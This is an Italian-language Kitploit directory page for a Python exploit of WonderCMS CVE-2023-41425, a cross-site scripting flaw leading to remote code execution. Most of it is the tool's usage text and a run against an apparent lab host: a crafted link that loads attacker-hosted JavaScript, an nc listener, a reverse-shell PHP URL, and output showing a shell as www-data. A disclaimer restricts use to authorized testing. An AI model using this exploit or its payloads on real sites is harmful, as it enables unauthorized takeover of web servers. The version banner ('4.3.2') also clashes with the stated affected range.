Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-41425 — Exploit Python per Wonder CMS XSS-to-RCE (CVE-2023-41425) che serve script dannosi localmente, consentendo l'esecuzione remota di codice senza dipendenze esterne. | Kitploit
Strumenti/GitHubGitHub/duck-sec/cve-2023-41425
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubduck-sec/cve-2023-41425

CVE-2023-41425

Exploit Python per Wonder CMS XSS-to-RCE (CVE-2023-41425) che serve script dannosi localmente, consentendo l'esecuzione remota di codice senza dipendenze esterne.

Vedi Repository
3461 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-41425

Descrizione

Una vulnerabilità di Cross Site Scripting in WonderCMS dalla versione 3.2.0 alla versione 3.4.2 consente a un attaccante remoto di eseguire codice arbitrario tramite uno script modificato caricato nel componente installModule. Questa è una versione modificata dell'exploit originale di prodigiousMind che estende l'exploit per servire l'intero exploit in locale, senza dipendere da una connessione internet esterna.

È utile se siete in alto mare e avete trovato un problema con la vostra moto...

Nota: xss.js è lasciato nel repository a scopo dimostrativo, lo script sovrascriverà questo con la tua configurazione quando eseguito.

Utilizzo

root@kitploit:~
usage: exploit.py [-h] -u URL -lh LHOST -lp LPORT -sh SRVHOST -sp SRVPORT

WonderCMS 4.3.2 XSS to RCE Exploit

opzioni:
  -h, --help            mostra questo messaggio di aiuto ed esci
  -u URL, --url URL     L'URL di login del sito WonderCMS (es. http://localhost/wondercms/loginURL)
  -lh LHOST, --lhost LHOST
                        L'indirizzo IP per l'ascoltatore della reverse shell
  -lp LPORT, --lport LPORT
                        La porta per l'ascoltatore della reverse shell
  -sh SRVHOST, --srvhost SRVHOST
                        L'IP locale che serve il JavaScript XSS malevolo
  -sp SRVPORT, --srvport SRVPORT
                        La porta locale che serve il JavaScript XSS malevolo

Esempio

Nota: Questo exploit può essere piuttosto lento a funzionare!

root@kitploit:~
$python3 exploit.py -u http://sea.htb/loginURL  -lh 10.10.14.101 -lp  7777  -sh 10.10.14.101 -sp 8888
##################################
# Wondercms 4.3.2 XSS to RCE     #
# Original POC by prodigiousMind #
# Updated version by Ducksec     #
##################################


Check you got this stuff right!


Parsed arguments:
URL: http://sea.htb/loginURL
LHOST: 10.10.14.101
LPORT: 7777
SRVHOST: 10.10.14.101
SRVPORT: 8888


[+] xss.js is created
[+] Execute the below command in another terminal:

----------------------------
nc -lvp 7777
----------------------------

Send the below link to admin:

----------------------------
http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.14.101:8888/xss.js"></script><form+action="
----------------------------



[+] Ensure that main.zip is still in this directory.
[+] Once the target successfully requests main.zip it's safe to kill this script.


[+] Once complete, you can also re-exploit by requesting: http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.101&lport=7777

Starting HTTP server to allow access to xss.js
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
10.129.178.129 - - [02/Oct/2024 14:39:51] "GET /xss.js HTTP/1.1" 200 -
10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
10.129.178.129 - - [02/Oct/2024 14:40:01] "GET /main.zip HTTP/1.1" 200 -
root@kitploit:~
$nc -nvlp 7777
listening on [any] 7777 ...
connect to [10.10.14.101] from (UNKNOWN) [10.129.178.129] 39958
Linux sea 5.4.0-190-generic #210-Ubuntu SMP Fri Jul 5 17:03:38 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
 13:40:01 up 4 min,  0 users,  load average: 0.93, 0.49, 0.20
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

Riferimenti

  1. https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413
  2. https://github.com/WonderCMS/wondercms/releases/tag/3.4.3

Dichiarazione di non responsabilità

Questo codice è fornito esclusivamente per scopi educativi e di test di sicurezza etici. Deve essere utilizzato responsabilmente e solo in ambienti in cui è stata concessa un'autorizzazione esplicita. L'uso non autorizzato o malevolo è severamente vietato. Usando questo codice, accetti di rispettare tutte le leggi, i regolamenti e gli standard etici applicabili nella tua giurisdizione. I creatori e i collaboratori declinano ogni responsabilità per eventuali danni o conseguenze derivanti dall'uso improprio o non autorizzato di questo codice.

Scarica lo strumento